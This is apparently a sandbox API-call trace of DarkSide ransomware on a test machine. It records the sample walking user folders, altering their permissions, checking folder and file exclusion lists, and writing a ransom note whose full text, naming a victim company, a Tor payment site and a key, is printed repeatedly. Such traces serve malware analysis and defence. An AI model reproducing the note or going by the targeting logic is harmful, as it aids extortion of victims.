0x1f8e18 [0158.890] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0158.890] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0158.890] GetNamedSecurityInfoW () returned 0x0 [0158.890] SetEntriesInAclW () returned 0x0 [0158.890] SetNamedSecurityInfoW () returned 0x0 [0158.892] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b2a8) returned 1 [0158.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.893] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads")) returned 1 [0158.893] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.893] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.893] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0158.894] CloseHandle (hObject=0x1a4) returned 1 [0158.895] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads")) returned 0x11 [0158.895] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="" [0158.895] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 0x2c [0158.895] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0158.895] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8c673740, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c673740, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.896] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.896] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0158.896] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0158.896] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0158.896] wcslen (_String="autorun.inf") returned 0xb [0158.896] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0158.896] wcslen (_String="boot.ini") returned 0x8 [0158.896] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0158.896] wcslen (_String="bootfont.bin") returned 0xc [0158.896] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0158.896] wcslen (_String="bootsect.bak") returned 0xc [0158.896] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0158.896] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c673740, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8c673740, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c6998a0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0158.896] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0158.896] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0158.896] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0158.896] _wcsicmp (_Str1="backup", _Str2="Downloads") returned -2 [0158.896] wcslen (_String="backup") returned 0x6 [0158.897] _wcsicmp (_Str1="bak", _Str2="Downloads") returned -2 [0158.897] wcslen (_String="bak") returned 0x3 [0158.897] _wcsicmp (_Str1="back", _Str2="Downloads") returned -2 [0158.897] wcslen (_String="back") returned 0x4 [0158.897] _wcsicmp (_Str1="archive", _Str2="Downloads") returned -3 [0158.897] wcslen (_String="archive") returned 0x7 [0158.897] _wcsicmp (_Str1="bckp", _Str2="Downloads") returned -2 [0158.897] wcslen (_String="bckp") returned 0x4 [0158.897] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0158.898] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0158.898] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0158.898] _wcsicmp (_Str1="$recycle.bin", _Str2="Favorites") returned -66 [0158.898] wcslen (_String="$recycle.bin") returned 0xc [0158.898] _wcsicmp (_Str1="config.msi", _Str2="Favorites") returned -3 [0158.898] wcslen (_String="config.msi") returned 0xa [0158.898] _wcsicmp (_Str1="$windows.~bt", _Str2="Favorites") returned -66 [0158.899] wcslen (_String="$windows.~bt") returned 0xc [0158.899] _wcsicmp (_Str1="$windows.~ws", _Str2="Favorites") returned -66 [0158.899] wcslen (_String="$windows.~ws") returned 0xc [0158.899] _wcsicmp (_Str1="windows", _Str2="Favorites") returned 17 [0158.899] wcslen (_String="windows") returned 0x7 [0158.899] _wcsicmp (_Str1="appdata", _Str2="Favorites") returned -5 [0158.899] wcslen (_String="appdata") returned 0x7 [0158.899] _wcsicmp (_Str1="application data", _Str2="Favorites") returned -5 [0158.899] wcslen (_String="application data") returned 0x10 [0158.899] _wcsicmp (_Str1="boot", _Str2="Favorites") returned -4 [0158.899] wcslen (_String="boot") returned 0x4 [0158.899] _wcsicmp (_Str1="google", _Str2="Favorites") returned 1 [0158.899] wcslen (_String="google") returned 0x6 [0158.899] _wcsicmp (_Str1="mozilla", _Str2="Favorites") returned 7 [0158.899] wcslen (_String="mozilla") returned 0x7 [0158.899] _wcsicmp (_Str1="program files", _Str2="Favorites") returned 10 [0158.899] wcslen (_String="program files") returned 0xd [0158.899] _wcsicmp (_Str1="program files (x86)", _Str2="Favorites") returned 10 [0158.899] wcslen (_String="program files (x86)") returned 0x13 [0158.899] _wcsicmp (_Str1="programdata", _Str2="Favorites") returned 10 [0158.899] wcslen (_String="programdata") returned 0xb [0158.900] _wcsicmp (_Str1="system volume information", _Str2="Favorites") returned 13 [0158.900] wcslen (_String="system volume information") returned 0x19 [0158.900] _wcsicmp (_Str1="tor browser", _Str2="Favorites") returned 14 [0158.900] wcslen (_String="tor browser") returned 0xb [0158.900] _wcsicmp (_Str1="windows.old", _Str2="Favorites") returned 17 [0158.900] wcslen (_String="windows.old") returned 0xb [0158.900] _wcsicmp (_Str1="intel", _Str2="Favorites") returned 3 [0158.900] wcslen (_String="intel") returned 0x5 [0158.900] _wcsicmp (_Str1="msocache", _Str2="Favorites") returned 7 [0158.900] wcslen (_String="msocache") returned 0x8 [0158.900] _wcsicmp (_Str1="perflogs", _Str2="Favorites") returned 10 [0158.900] wcslen (_String="perflogs") returned 0x8 [0158.900] _wcsicmp (_Str1="x64dbg", _Str2="Favorites") returned 18 [0158.900] wcslen (_String="x64dbg") returned 0x6 [0158.900] _wcsicmp (_Str1="public", _Str2="Favorites") returned 10 [0158.900] wcslen (_String="public") returned 0x6 [0158.900] _wcsicmp (_Str1="all users", _Str2="Favorites") returned -5 [0158.900] wcslen (_String="all users") returned 0x9 [0158.900] _wcsicmp (_Str1="default", _Str2="Favorites") returned -2 [0158.900] wcslen (_String="default") returned 0x7 [0158.900] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0158.900] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0158.901] wcscpy (in: _Dest=0x1d1044, _Source="Favorites" | out: _Dest="Favorites") returned="Favorites" [0158.901] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0158.901] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0158.901] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" [0158.901] GetNamedSecurityInfoW () returned 0x0 [0158.902] SetEntriesInAclW () returned 0x0 [0158.902] SetNamedSecurityInfoW () returned 0x0 [0158.984] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b348) returned 1 [0158.984] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.984] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites")) returned 1 [0158.984] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.984] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.984] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0158.985] CloseHandle (hObject=0x1a4) returned 1 [0158.985] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites")) returned 0x11 [0158.986] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="" [0158.986] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 0x2c [0158.986] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0158.986] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8c757f80, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8c757f80, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.986] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0158.986] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0158.986] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0158.986] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0158.986] wcslen (_String="autorun.inf") returned 0xb [0158.986] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0158.986] wcslen (_String="boot.ini") returned 0x8 [0158.986] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0158.986] wcslen (_String="bootfont.bin") returned 0xc [0158.986] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0158.986] wcslen (_String="bootsect.bak") returned 0xc [0158.986] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0158.986] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0158.986] _wcsicmp (_Str1="$recycle.bin", _Str2="Links") returned -72 [0158.986] wcslen (_String="$recycle.bin") returned 0xc [0158.986] _wcsicmp (_Str1="config.msi", _Str2="Links") returned -9 [0158.987] wcslen (_String="config.msi") returned 0xa [0158.987] _wcsicmp (_Str1="$windows.~bt", _Str2="Links") returned -72 [0158.987] wcslen (_String="$windows.~bt") returned 0xc [0158.987] _wcsicmp (_Str1="$windows.~ws", _Str2="Links") returned -72 [0158.987] wcslen (_String="$windows.~ws") returned 0xc [0158.987] _wcsicmp (_Str1="windows", _Str2="Links") returned 11 [0158.987] wcslen (_String="windows") returned 0x7 [0158.987] _wcsicmp (_Str1="appdata", _Str2="Links") returned -11 [0158.987] wcslen (_String="appdata") returned 0x7 [0158.987] _wcsicmp (_Str1="application data", _Str2="Links") returned -11 [0158.987] wcslen (_String="application data") returned 0x10 [0158.987] _wcsicmp (_Str1="boot", _Str2="Links") returned -10 [0158.987] wcslen (_String="boot") returned 0x4 [0158.987] _wcsicmp (_Str1="google", _Str2="Links") returned -5 [0158.987] wcslen (_String="google") returned 0x6 [0158.987] _wcsicmp (_Str1="mozilla", _Str2="Links") returned 1 [0158.987] wcslen (_String="mozilla") returned 0x7 [0158.987] _wcsicmp (_Str1="program files", _Str2="Links") returned 4 [0158.987] wcslen (_String="program files") returned 0xd [0158.987] _wcsicmp (_Str1="program files (x86)", _Str2="Links") returned 4 [0158.987] wcslen (_String="program files (x86)") returned 0x13 [0158.987] _wcsicmp (_Str1="programdata", _Str2="Links") returned 4 [0158.987] wcslen (_String="programdata") returned 0xb [0158.987] _wcsicmp (_Str1="system volume information", _Str2="Links") returned 7 [0158.987] wcslen (_String="system volume information") returned 0x19 [0158.987] _wcsicmp (_Str1="tor browser", _Str2="Links") returned 8 [0158.987] wcslen (_String="tor browser") returned 0xb [0158.987] _wcsicmp (_Str1="windows.old", _Str2="Links") returned 11 [0158.987] wcslen (_String="windows.old") returned 0xb [0158.987] _wcsicmp (_Str1="intel", _Str2="Links") returned -3 [0158.987] wcslen (_String="intel") returned 0x5 [0158.987] _wcsicmp (_Str1="msocache", _Str2="Links") returned 1 [0158.987] wcslen (_String="msocache") returned 0x8 [0158.987] _wcsicmp (_Str1="perflogs", _Str2="Links") returned 4 [0158.987] wcslen (_String="perflogs") returned 0x8 [0158.988] _wcsicmp (_Str1="x64dbg", _Str2="Links") returned 12 [0158.988] wcslen (_String="x64dbg") returned 0x6 [0158.988] _wcsicmp (_Str1="public", _Str2="Links") returned 4 [0158.988] wcslen (_String="public") returned 0x6 [0158.988] _wcsicmp (_Str1="all users", _Str2="Links") returned -11 [0158.988] wcslen (_String="all users") returned 0x9 [0158.988] _wcsicmp (_Str1="default", _Str2="Links") returned -8 [0158.988] wcslen (_String="default") returned 0x7 [0158.989] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*" [0158.989] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 0x2d [0158.989] wcscpy (in: _Dest=0x208e78, _Source="Links" | out: _Dest="Links") returned="Links" [0158.990] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0158.991] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0158.992] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0158.992] GetNamedSecurityInfoW () returned 0x0 [0158.992] SetEntriesInAclW () returned 0x0 [0158.992] SetNamedSecurityInfoW () returned 0x0 [0158.995] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b3e8) returned 1 [0158.995] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.995] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 1 [0158.995] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.995] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.997] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0158.998] CloseHandle (hObject=0x1a4) returned 1 [0158.998] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links")) returned 0x11 [0158.999] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="" [0158.999] wcslen 